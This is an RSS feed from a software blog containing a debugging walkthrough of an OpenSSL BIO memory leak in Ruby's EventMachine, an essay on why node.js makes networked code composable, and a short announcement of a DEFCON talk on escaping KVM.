<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs</title>
	<atom:link href="http://blog.nelhage.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 07 Mar 2013 17:28:45 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Tracking down a memory leak in Ruby&#8217;s EventMachine</title>
		<link>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/</link>
		<comments>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/#comments</comments>
		<pubDate>Thu, 07 Mar 2013 17:13:37 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[Software Engineering]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=1863</guid>
		<description><![CDATA[At Stripe, we rely heavily on ruby and EventMachine to power various internal and external services. Over the last several months, we&#8217;ve known that one such service suffered from a gradual memory leak, that would cause its memory usage to gradually balloon from a normal ~50MB to multiple gigabytes. It was easy enough to work [...]]]></description>
				<content:encoded><![CDATA[<p>At <a href="https://stripe.com">Stripe</a>, we rely heavily on <a href="http://www.ruby-lang.org/en/">ruby</a> and
<a href="http://rubyeventmachine.com/">EventMachine</a> to power various internal and external
services. Over the last several months, we&#8217;ve known that one such
service suffered from a gradual memory leak that would cause its
memory usage to balloon from a normal ~50MB to multiple gigabytes.</p>

<p>It was easy enough to work around the leak by adding monitoring and
restarting the process whenever memory usage grew too large, but we
were determined to track down the root cause. Our exploration is a
tour through a number of different debugging tools and techniques, so
I thought I would share it here.</p>

<h2>Checking for ruby-level leaks</h2>

<p>One powerful technique for tracking down tough memory leaks is
post-mortem analysis. If our program&#8217;s normal memory footprint is
50MB, and we let it leak until it&#8217;s using, say, 2GB, then
1950/2000 = 97.5% of the program&#8217;s memory is leaked objects! If we look at a core
file (or, even better, a running image in <code>gdb</code>), signs of the leak
will be all over the place.</p>

<p>So, we let the program leak, and, when its memory usage got large
enough, failed active users over to a secondary server, and attached
gdb to the bloated image.</p>

<p>Our first instinct in a situation like this is that our Ruby code is
leaking somehow, such as by accidentally keeping a list of every
connection it has ever seen. It&#8217;s easy to investigate this possibility
by using gdb, the Ruby C API, and the Ruby internal GC hooks:</p>

<pre><code>(gdb) p rb_eval_string("GC.start")
$1 = 4
(gdb) p rb_eval_string("$gdb_objs = Hash.new 0")
$2 = 991401552
(gdb) p rb_eval_string("ObjectSpace.each_object {|o| $gdb_objs[o.class] += 1}")
$3 = 84435
(gdb) p rb_eval_string("$stderr.puts($gdb_objs.inspect)")
$4 = 4
</code></pre>

<p>Calling <code>rb_eval_string</code> lets us inject arbitrary ruby code into the
running ruby process, from within gdb. Using that, we first trigger a
GC &#8212; making sure that any unreferenced objects are cleaned up &#8212; and
then walk the Ruby ObjectSpace, building up a census of which Ruby
objects exist. Looking at the output and filtering for the top
objects, we find:</p>

<pre><code>String =&gt; 26399
Array  =&gt; 8402
Hash   =&gt; 2161
Proc   =&gt; 608
</code></pre>

<p>Just looking at those numbers, my gut instinct is that nothing looks
too out of whack. Running some back-of-the-envelope numbers confirms
this instinct:</p>

<ul>
<li>In total, that&#8217;s about 40,000 objects for those object types.</li>
<li>We&#8217;re looking for a gradual leak, so we expect lots of small
objects. Let&#8217;s guess that &#8220;small&#8221; is around 1 kilobyte.</li>
<li>40,000 1k objects is only 40MB. Our process is multiple GB at
this point, so we are nowhere near explaining our memory usage.</li>
</ul>
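
<p>Spelled out as a quick calculation, that estimate looks like this. It is only a rough sketch: the 1 kilobyte object size is the guess from the list above, and 2GB stands in for &#8220;multiple GB&#8221;.</p>

<pre><code># Census counts taken from the gdb session above.
census = {"String": 26399, "Array": 8402, "Hash": 2161, "Proc": 608}

GUESSED_OBJECT_BYTES = 1024      # assumption: a "small" object is about 1 KB
PROCESS_BYTES = 2 * 1024 ** 3    # assumption: "multiple GB" taken as 2 GB

total_objects = sum(census.values())
estimated_bytes = total_objects * GUESSED_OBJECT_BYTES
share = estimated_bytes / PROCESS_BYTES

print(total_objects, "objects")
print(round(estimated_bytes / 1024 ** 2, 1), "MB estimated")
print(round(100 * share, 1), "% of the process")
</code></pre>

<p>Even with the generous 1 kilobyte guess, the census accounts for under 2% of a 2GB process.</p>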

<p>It&#8217;s possible, of course, that <em>one</em> of those Strings has been growing
without bound, and is now billions of characters long, but that feels
unlikely. A quick survey of String lengths using <code>ObjectSpace</code> would
settle the question, but we didn&#8217;t even bother at this point.</p>

<h2>Searching for C object leaks</h2>

<p>So, we&#8217;ve mostly ruled out a Ruby-level leak. What now?</p>

<p>Well, as mentioned, 95+% of our program&#8217;s memory
footprint is leaked objects. So if we just take a random sample of
bits of memory, we will find leaked objects with very good
probability. We generate a core file in gdb:</p>

<pre><code>(gdb) gcore leak.core
Saved corefile leak.core
</code></pre>

<p>And then look at a random page (4k block) of the core file:</p>

<pre><code>$ pages=$(($(stat -c "%s" leak.core)/4096))
$ off=$(shuf -i 0-$((pages-1)) -n 1)  # $RANDOM stops at 32767, too few pages for a multi-GB core
$ dd if=leak.core bs=4096 skip=$off count=1 | xxd
0000000: 0000 0000 0000 0000 4590 c191 3a71 b2aa  ........E...:q..
...
</code></pre>

<p>Repeating a few times, we notice that most of the samples include what
looks to be a repeating pattern:</p>

<pre><code>00000f0: b05e 9b0a 0000 0000 0000 0000 0000 0000  .^..............
0000100: 0000 0000 0000 0000 0100 0000 dcfa 1939  ...............9
0000110: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000120: 0000 0000 0000 0000 d03b a51f 0000 0000  .........;......
0000130: 8000 0000 0000 0000 8100 0000 0000 0000  ................
0000140: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000150: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000160: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000170: 40ef e145 0000 0000 0000 0000 0000 0000  @..E............
0000180: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000190: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001b0: 8000 0000 0000 0000 8100 0000 0000 0000  ................
00001c0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00001d0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
00001e0: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
00001f0: 4062 1047 0000 0000 0000 0000 0000 0000  @b.G............
0000200: 0000 0000 0000 0000 0100 0000 1b7f 0000  ................
0000210: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
0000220: 0000 0000 0000 0000 e103 0000 0000 0000  ................
0000230: 8000 0000 0000 0000 9100 0000 0000 0000  ................
0000240: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
0000250: 0000 0000 0000 0000 0100 0000 0100 0000  ................
0000260: 0000 0000 0000 0000 ffff ffff 0000 0000  ................
0000270: 50b0 350b 0000 0000 0000 0000 0000 0000  P.5.............
0000280: 0000 0000 0000 0000 0100 0000 0000 0000  ................
0000290: 0000 0000 0000 0000 0a05 0000 0000 0000  ................
00002a0: 0000 0000 0000 0000 30de 4027 0000 0000  ........0.@'....
00002b0: 0077 7108 0000 0000 0060 7b97 b4d2 f111  .wq......`{.....
00002c0: 9000 0000 0000 0000 8100 0000 0000 0000  ................
00002d0: 00a8 5853 1b7f 0000 0000 0000 0000 0000  ..XS............
00002e0: 0000 0000 0000 0000 0100 0000 0100 0000  ................
</code></pre>

<p>Those <code>ffff ffff</code> blocks, repeated every 128 bytes, leap out at me,
and 4 out of 5 samples of the core file reveal a similar pattern. It seems
probable that we&#8217;re leaking 128-byte objects of some sort, some field
of which is <code>-1</code> as a signed 32-bit integer, i.e. <code>ffff ffff</code> in hex.</p>

<p>Looking further, we also notice a repeated <code>00a8 5853 1b7f 0000</code>, two lines before each <code>ffff ffff</code>. If you&#8217;ve stared at too many Linux coredumps, as I
have, that number looks suspicious. Interpreted in little-endian, that
is <code>0x00007f1b5358a800</code>, which points near the top of the userspace
portion of the address space on an amd64 Linux machine.</p>

<p>In fewer words: It&#8217;s most likely a pointer.</p>
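
<p>If you would rather not do the byte-swapping in your head, the conversion is easy to check. A minimal sketch: the eight bytes are copied from the dump above, and the 47-bit figure is the usual size of the userspace half of the address space on amd64 Linux.</p>

<pre><code># The eight bytes from the hex dump, in the order they appear in memory.
raw = bytes.fromhex("00a8 5853 1b7f 0000")

# amd64 is little-endian: the first byte in memory is the least significant.
pointer = int.from_bytes(raw, "little")
print(hex(pointer))

# Userspace addresses on amd64 Linux fit in 47 bits. A value that needs
# all 47 of them sits in the top half of that range.
print(pointer.bit_length(), "bits")
</code></pre>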

<p>The presence of an identical pointer in every leaked object suggests
that the pointer most likely points to some kind of &#8220;type&#8221; object or
tag, containing information about the type of the leaked object. For
instance, if we were leaking Ruby String objects, every one would have
an identical pointer to the Ruby object that represents the <code>String</code>
class. So, let&#8217;s take a look:</p>

<pre><code>(gdb) x/16gx 0x00007f1b5358a800
0x7f1b5358a800: 0x0000000000000401  0x00007f1b53340f24
0x7f1b5358a810: 0x00007f1b532c7780  0x00007f1b532c7690
0x7f1b5358a820: 0x00007f1b532c7880  0x00007f1b532c78c0
0x7f1b5358a830: 0x00007f1b532c74f0  0x00007f1b532c74c0
0x7f1b5358a840: 0x00007f1b532c7470  0x0000000000000000
0x7f1b5358a850: 0x0000000000000000  0x0000000000000000
0x7f1b5358a860: 0x0000000000000406  0x00007f1b5332a549
0x7f1b5358a870: 0x00007f1b532c7a40  0x00007f1b532c7a30
</code></pre>

<p>The first field, <code>0x401</code>, has only two bits set, suggesting some
kind of flag field. After that, there are a whole bunch of
pointers. Let&#8217;s chase the first one:</p>

<pre><code>(gdb) x/s 0x00007f1b53340f24
0x00007f1b53340f24: "memory buffer"
</code></pre>

<p>Great. So we are leaking &#8230; memory buffers. Thanks.</p>

<p>But this is actually fantastically informative, especially coupled
with the one other piece of information we have: <code>/proc/&lt;pid&gt;/maps</code>
for the target program, which tells us which files are mapped into our
program at which addresses. Searching that for the target address, we
find:</p>

<pre><code>7f1b53206000-7f1b5336c000 r-xp 00000000 08:01 16697      /lib/libcrypto.so.0.9.8
</code></pre>

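<p>The &#8220;type&#8221; object itself, at <code>0x7f1b5358a800</code>, lies above this mapping, but every
pointer we saw inside it lands in it: <code>0x7f1b53206000</code> ≤ <code>0x7f1b53340f24</code> &lt; <code>0x7f1b5336c000</code>
for the name string, and the function pointers after it fall in the same range. <code>libcrypto</code> is the library containing
OpenSSL&#8217;s cryptographic routines, so we are leaking some sort of
OpenSSL buffer object. This is real progress.</p>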
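
<p>A lookup like this is easy to script. Here is a minimal sketch, assuming the maps line format shown above; <code>parse_maps_line</code> is a made-up helper, and the address it checks is the <code>"memory buffer"</code> string that gdb printed earlier.</p>

<pre><code>def parse_maps_line(line):
    """Split one /proc/PID/maps line into (start, end, perms, path)."""
    fields = line.split()
    start_hex, end_hex = fields[0].split("-")
    path = " ".join(fields[5:])      # empty for anonymous mappings
    return int(start_hex, 16), int(end_hex, 16), fields[1], path


MAPS_LINE = ("7f1b53206000-7f1b5336c000 r-xp 00000000 08:01 16697"
             "      /lib/libcrypto.so.0.9.8")
NAME_STRING = 0x00007F1B53340F24     # where gdb found "memory buffer"

start, end, perms, path = parse_maps_line(MAPS_LINE)

# A mapping covers its start address (inclusive) up to its end (exclusive),
# which is exactly what membership in range(start, end) tests.
inside = NAME_STRING in range(start, end)
print(hex(NAME_STRING), "inside" if inside else "outside", path, perms)
</code></pre>

<p>In practice you would loop over every line of the maps file and print the one mapping that contains the address.</p>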

<p>I am not overly familiar with libssl/libcrypto, so let&#8217;s go to the
source to learn more:</p>

<pre><code>$ apt-get source libssl0.9.8
$ cd openssl*
$ grep -r "memory buffer" .
./crypto/err/err_str.c:{ERR_PACK(ERR_LIB_BUF,0,0)       ,"memory buffer routines"},
./crypto/asn1/asn1.h: * be inserted in the memory buffer
./crypto/bio/bss_mem.c: "memory buffer",
./README:        sockets, socket accept, socket connect, memory buffer, buffering, SSL
./doc/ssleay.txt:-  BIO_s_mem()  memory buffer - a read/write byte array that
./test/times:talks both sides of the SSL protocol via a non-blocking memory buffer
</code></pre>

<p>Only one of those is exactly the string constant we found, so we go browse
<code>./crypto/bio/bss_mem.c</code> and read the docs (<a href="http://www.openssl.org/docs/crypto/bio.html">bio(3)</a> and
<a href="http://www.openssl.org/docs/crypto/buffer.html">buffer(3)</a>) a bit. Sparing you all the details, we learn:</p>

<ul>
<li>OpenSSL uses the <code>BIO</code> structure as a generic abstraction around any kind of
source or sink of data that can be read from or written to.</li>
<li>A <code>BIO</code> has a pointer to a <code>BIO_METHOD</code>, which essentially contains
a small amount of metadata and a
<a href="http://en.wikipedia.org/wiki/Virtual_method_table">vtable</a>,
describing what specific kind of <code>BIO</code> this is, and how to interact
with it. The second field in a <code>BIO_METHOD</code> is a <code>char *</code> pointing
at a string holding the name of this type.</li>
<li>One of the common types of <code>BIO</code>s is the <code>mem</code> <code>BIO</code>, backed
directly by an in-memory buffer (a <code>BUF_MEM</code>). The <code>BIO_METHOD</code> for
memory <code>BIO</code>s has the type tag <code>"memory buffer"</code>.</li>
</ul>

<p>So, it appears we are leaking <code>BIO</code> objects. Interestingly, we don&#8217;t
actually seem to be leaking the underlying memory buffers, just the
<code>BIO</code> struct that contains the metadata about the buffer.</p>

<h2>Tracing the source</h2>

<p>This kind of leak has to be in some C code somewhere. Clearly nothing in pure ruby code should be able to do this. The server in question contains no C extensions we wrote, so it&#8217;s probably in some third-party library we use.</p>

<p>A leak in OpenSSL itself is certainly possible, but OpenSSL is very
widely used and quite mature, so let&#8217;s assume (hope) that our leak is not
there, for now.</p>

<p>That leaves EventMachine as the most likely culprit. Our program uses
SSL heavily via the EventMachine APIs, and we do know that
EventMachine contains a bunch of C/C++, which, to be frank, does not
have a sterling reputation.</p>

<p>So, we pull up an EventMachine checkout. There are a number of ways to
construct a new <code>BIO</code>, but the most basic and common seems to be
<code>BIO_new</code>, sensibly enough. So let&#8217;s look for that:</p>

<pre><code>$ git grep BIO_new
ext/rubymain.cpp:       out = BIO_new(BIO_s_mem());
ext/ssl.cpp:    BIO *bio = BIO_new_mem_buf (PrivateMaterials, -1);
ext/ssl.cpp:    pbioRead = BIO_new (BIO_s_mem());
ext/ssl.cpp:    pbioWrite = BIO_new (BIO_s_mem());
ext/ssl.cpp:    out = BIO_new(BIO_s_mem());
</code></pre>

<p>Great: there are some calls (so it could be one of them!), but not too
many (so we can reasonably audit them all).</p>

<p>Starting from the top, we find, in <code>ext/rubymain.cpp</code>:</p>

<pre><code>static VALUE t_get_peer_cert (VALUE self, VALUE signature)
{
    VALUE ret = Qnil;
    X509 *cert = NULL;
    BUF_MEM *buf;
    BIO *out;

    cert = evma_get_peer_cert (NUM2ULONG (signature));

    if (cert != NULL) {
        out = BIO_new(BIO_s_mem());
        PEM_write_bio_X509(out, cert);
        BIO_get_mem_ptr(out, &amp;buf);
        ret = rb_str_new(buf-&gt;data, buf-&gt;length);
        X509_free(cert);
        BUF_MEM_free(buf);
    }

    return ret;
}
</code></pre>

<p>The OpenSSL APIs are less than perfectly self-descriptive, but it&#8217;s not too hard to puzzle out what&#8217;s going on here: </p>

<p>We first construct a new <code>BIO</code> backed by a memory buffer:</p>

<pre><code>out = BIO_new(BIO_s_mem());
</code></pre>

<p>We write the certificate text into that <code>BIO</code>:</p>

<pre><code>PEM_write_bio_X509(out, cert);
</code></pre>

<p>Get a pointer to the underlying <code>BUF_MEM</code>:</p>

<pre><code>BIO_get_mem_ptr(out, &amp;buf);
</code></pre>

<p>Convert it to a Ruby string:</p>

<pre><code>ret = rb_str_new(buf-&gt;data, buf-&gt;length);
</code></pre>

<p>And then free the memory:</p>

<pre><code>BUF_MEM_free(buf);
</code></pre>

<p>But we&#8217;ve called the wrong free function! We&#8217;re freeing <code>buf</code>, which
is the underlying <code>BUF_MEM</code>, but we&#8217;ve leaked <code>out</code>, the
<code>BIO</code> itself, which we also allocated. This is exactly the kind of leak we saw in our
core dump!</p>

<p>Continuing our audit, we find the exact same bug in
<code>ssl_verify_wrapper</code> in <code>ssl.cpp</code>. Reading code, we learn that
<code>t_get_peer_cert</code> is called by the Ruby function <a href="http://eventmachine.rubyforge.org/EventMachine/Connection.html#get_peer_cert-instance_method"><code>get_peer_cert</code></a>, used
to retrieve the peer certificate from a TLS connection, and that
<code>ssl_verify_wrapper</code> is called if you pass <code>:verify_peer =&gt; true</code> to
<a href="http://eventmachine.rubyforge.org/EventMachine/Connection.html#start_tls-instance_method"><code>start_tls</code></a>, to convert the certificate into a Ruby
string for passing to the <code>ssl_verify_peer</code> hook.</p>

<p>So, any time you made a <code>TLS</code> or <code>SSL</code> connection with EventMachine
<strong>and verified the peer certificate</strong>, EventMachine leaked 128
bytes! Since it&#8217;s presumably pretty rare to make a large number of SSL
connections from a single Ruby process, it&#8217;s not totally surprising
that no one had caught this before.</p>

<p>Having found the issue, the
<a href="https://github.com/eventmachine/eventmachine/commit/b2006a6f4893f35ca8b1b5fc283f3b1e2127bc5c">fix</a>
was simple, and was promptly
<a href="https://github.com/eventmachine/eventmachine/commit/016800f60bd1ec1894fd73ccd0c2634f5fabc1c9">merged</a>
upstream.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2013/03/tracking-an-eventmachine-leak/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Why node.js is cool (it&#8217;s not about performance)</title>
		<link>http://blog.nelhage.com/2012/03/why-node-js-is-cool/</link>
		<comments>http://blog.nelhage.com/2012/03/why-node-js-is-cool/#comments</comments>
		<pubDate>Mon, 12 Mar 2012 15:36:35 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[composability]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[node.js]]></category>
		<category><![CDATA[software]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=484</guid>
		<description><![CDATA[For the past N months, it seems like there is no new technology stack that is either hotter or more controversial than node.js. node.js is cancer! node.js cures cancer! node.js is bad ass rock star tech!. I myself have given node.js a lot of shit, often involving the phrase &#8220;explicit continuation-passing style.&#8221; Most of the [...]]]></description>
				<content:encoded><![CDATA[<p>For the past N months, it seems like there is no new technology stack
that is either hotter or more controversial than node.js. <a href="http://teddziuba.com/2011/10/node-js-is-cancer.html">node.js is
cancer</a>!
<a href="http://blog.brianbeck.com/post/10967024222/node-js-cures-cancer">node.js cures
cancer</a>!
<a href="http://www.youtube.com/watch?v=bzkRVzciAZg">node.js is bad ass rock star
tech</a>! I myself have
given node.js a lot of shit, often involving the phrase &#8220;explicit
continuation-passing style.&#8221;</p>

<p>Most of the arguments I&#8217;ve seen seem to center around whether node.js
is &#8220;scalable&#8221; or high-performance, and the relative merits of
single-threaded event loops versus threading for scaling out, or other
such noise. Or how to best write a Fibonacci server in node.js (wat?).</p>

<p>I am going to completely ignore all of that (and I think you should,
too!), and argue that node.js is in fact on to something really cool,
and is worth using and thinking about, but for a reason that has
absolutely nothing to do with scalability or performance.</p>

<h2>The Problem</h2>

<p>node.js is cool because it solves a problem shared by virtually every
mainstream language. That problem is the fact that, as long as
&#8220;ordinary&#8221; blocking code is the default, it is difficult and unnatural
to write networked code in a way that it can be combined with other
network code, while allowing them to interact.</p>

<p>In most languages/environments &#8212; virtually every other language
people use today &#8212; when you write networked code, you can either make
it fully blocking itself, and implement your own main loop &#8212; which is
almost always easiest &#8212; or you can pick your favorite event loop
library (you probably have half a dozen choices), and write your code
around that. If you do the latter, not only will your code likely be
more awkward than if you chose the blocking main loop approach, but
your only reward for the effort is that your code is combinable with
the small fraction of other code that also chose the same event loop
library.</p>

<p>The upshot of this situation is that if you pick a couple of random
networked libraries written by different people &#8212; let&#8217;s say, an HTTP
server, a Twitter client, and an IRC client, for example &#8212; and want
to combine them &#8212; maybe you want a Twitter &lt;-&gt; IRC bridge with a
web-based admin panel &#8212; you will end up at best having to write some
awkward glue code, and at worst doing something truly hackish in order
to make them communicate at all.</p>

<p>(In case you&#8217;re not convinced about the existence or scope of this
problem, you can detour ahead to the optional <a href="#example">example</a> of
how this problem manifests with typical Python libraries.)</p>

<h2>Enter node.js</h2>

<p>node.js solves this problem, somewhat paradoxically by reducing the
number of options available to developers. By having a built-in event
loop, and by making that event loop the default way to accomplish
virtually anything at all (e.g. all of the builtin IO functions work
asynchronously on the same event loop), node.js provides a very strong
pressure to write networked code in a certain way. The upshot of this
pressure is that, since essentially every node.js library works this
way, you can pick and choose arbitrary node.js libraries and combine
them in the same program, without even having to think about the fact
that you&#8217;re doing so.</p>

<p>node.js is cool, then, not for any performance or scalability reasons,
but because <strong>it makes composable networked components the default</strong>.</p>

<h2>Concluding Notes</h2>

<p>An interesting point here is that there are not really any fundamental
differences between what you <strong>can</strong> do in Python and node.js. The
Twisted project, for example, is basically an attempt to implement the
node.js ideology in Python (yes, I&#8217;m being terribly anachronistic
describing it that way). Twisted, however, has a fairly steep learning
curve, and &#8220;feels&#8221; unnatural to developers used to writing &#8220;normal&#8221;
Python, and so relatively few libraries get written for the Twisted
environment, compared to the rest of the Python ecosystem. Twisted
suffers from the fact that the Python language and Python community
are not set up to make Twisted the default way to do things.</p>

<p>The key is that node.js makes it, both technically and socially,
<strong>easier</strong> to write code in this composable way than not to do so. The
built-in event loop and nonblocking primitives make it technically
easy, and the social culture that has grown up around it discourages
libraries that don&#8217;t work this way, so libraries that attempt to just
block for IO are looked down on and are unlikely to thrive and gain
adoption and development resources.</p>

<p>I&#8217;m also not ignoring the downside of the node.js style &#8212; the
potentially convoluted callback-based style, the risk of bringing the
whole world to a halt with an accidental blocking call, the
single-threaded model that makes it hard to effectively exploit
multiple cores. node.js definitely makes you do more work than you
might otherwise have to, in many circumstances. But the key is, in
exchange for this work, you <strong>get</strong> something really cool &#8212; and
something much more valuable, in my opinion, than nebulous performance
gains.</p>

<p>I also don&#8217;t want to claim that node.js is the only system, or the
only technical approach, that makes this property possible. But
node.js is the most successful such system I know of, and that&#8217;s worth
at least as much as the technical possibility &#8212; what&#8217;s the use of
being able to combine third-party libraries, if no one has written
anything worth using in the first place?</p>

<p>And similarly, while the single-threaded callback model may not be the
best possible model, it seems to have hit a sweet spot
in terms of what developers are willing to put up
with. Certainly, people are writing node.js code like mad &#8212; check out
the <a href="http://search.npmjs.org/">npm registry</a> for a partial list.</p>

<p>So, node.js is not magic, and it definitely doesn&#8217;t cure cancer. But
there is something here worth looking at. The next time you need to
glue some unrelated networked services together, give node.js a shot
&#8211; I think you&#8217;ll like it. And if you&#8217;re still not convinced, glue a
quick HTTP frontend onto whatever you&#8217;ve created. I promise you&#8217;ll be
shocked by how easy it is.</p>

<p><a name="example"></a></p>

<h2>Postscript &#8211; A Python Example</h2>

<p>As an optional addendum, here&#8217;s a step-by-step discussion of just
how bad the situation is in most other languages.</p>

<p>Let&#8217;s imagine we want to write a trivial Jabber -&gt; IRC bridge: A bot
that lurks in an IRC channel, and signs on to Jabber, and sends all
the messages it receives on Jabber into the IRC channel. This is the
kind of simple problem that can be described in one sentence, and
sounds like it should take all of 20 lines of code, but actually turns
out to be rather a nuisance.</p>

<p>Python has, by this point, a great library ecosystem, so we happily
start googling, and find the plausible looking <a href="http://python-irclib.sourceforge.net/">python-irclib</a>
and <a href="http://xmpppy.sourceforge.net/">xmpppy</a> libraries. Great. So, what does code in each of
those look like? Well, in python-irclib, we construct a subclass of
<code>SingleServerIRCBot</code>, and call the <code>start</code> function, which runs the
IRC main loop:</p>

<pre><code>bot = MyBot(channel, nickname, server, port)
bot.start()
</code></pre>

<p>And in xmpppy, we construct an <code>xmpp.Client</code> object, and call
<code>Client.Process</code> in a loop, with a timeout:</p>

<pre><code>conn = xmpp.Client(server)
# connect to the server
while True:
  conn.Process(1)
</code></pre>

<p>Ok, so, we launch a thread for each one, and a few minutes of fumbling
later, we&#8217;re connected to both Jabber and IRC. So far, so good. We&#8217;re
using Python&#8217;s threads, which will inevitably bring us a world of
pain, but I&#8217;ll ignore that for now, since a better threading
implementation could fix most of the pain.</p>

<p>But now, what do we do when we receive a Jabber message? We want to
send a message out the python-irclib instance, but how do we do that?
python-irclib isn&#8217;t thread safe, so we can&#8217;t just call <code>.send()</code> from
the Jabber thread. Ok, so we add in a <code>Queue.Queue</code>, and have the
Jabber thread push messages onto it.</p>

<p>Now we just need to make the IRC thread fetch messages from this
queue. But how do we do that? The IRC thread is blocked somewhere deep
inside <code>python-irclib</code>, waiting for network traffic. How do we wake it
up to read messages from the queue? The easiest way is to switch from
calling <code>start</code> to calling <code>process_once</code> in a loop with a short
timeout.</p>

<p>This will work, and we&#8217;ll eventually get something working, but now
we&#8217;re forced into polling, with all the annoying latency/CPU tradeoffs
that entails, and also half of our code so far has just been spent
gluing these two libraries together.</p>
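
<p>To make the shape of that glue concrete, here is a minimal sketch of the queue-plus-polling arrangement. It is written for Python 3, where the module is named <code>queue</code>, and <code>FakeIRC</code> is a stand-in I made up for illustration: it is not python-irclib&#8217;s real API, and the Jabber side is reduced to a thread that produces two messages.</p>

<pre><code>import queue
import threading
import time


class FakeIRC:
    """Stand-in for an IRC client; not python-irclib's real API."""

    def __init__(self):
        self.sent = []

    def process_once(self, timeout):
        time.sleep(timeout)          # pretend to wait for network traffic

    def send(self, text):
        self.sent.append(text)


outbox = queue.Queue()               # carries messages from Jabber to IRC
done = threading.Event()


def jabber_thread():
    # Pretend two Jabber messages arrive, then the connection closes.
    for text in ["hello", "world"]:
        outbox.put(text)
    done.set()


def irc_thread(irc):
    # Poll: service IRC for a short while, then drain the queue.
    while not (done.is_set() and outbox.empty()):
        irc.process_once(0.01)
        while True:
            try:
                irc.send(outbox.get_nowait())
            except queue.Empty:
                break


irc = FakeIRC()
workers = [threading.Thread(target=jabber_thread),
           threading.Thread(target=irc_thread, args=(irc,))]
for worker in workers:
    worker.start()
for worker in workers:
    worker.join()
print(irc.sent)
</code></pre>

<p>The timeout passed to <code>process_once</code> is the tradeoff in miniature: make it shorter and the loop burns more CPU, make it longer and Jabber messages wait longer before they reach IRC.</p>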

<p>In node.js, on the other hand, we&#8217;d just instantiate client objects
for both protocols, set up some event handlers, and &#8230; well, that&#8217;s
about it. Because everything&#8217;s hooked into the same main loop, they&#8217;ll
Just Work together, and because we&#8217;re all running single-threaded, we
can mostly just communicate directly between the two libraries without
having to think too hard about race conditions or anything.</p>

<p>The point, of course, is not that it is impossible to write this
program in Python. It is possible, and I&#8217;ve done it, and it&#8217;s not <strong>that</strong>
terrible. But any option you take will involve some annoying
tradeoffs, and will involve making lots of irrelevant plumbing
decisions about how to make your pieces play well together. And
compared to all that, node.js feels like a breeze.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2012/03/why-node-js-is-cool/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

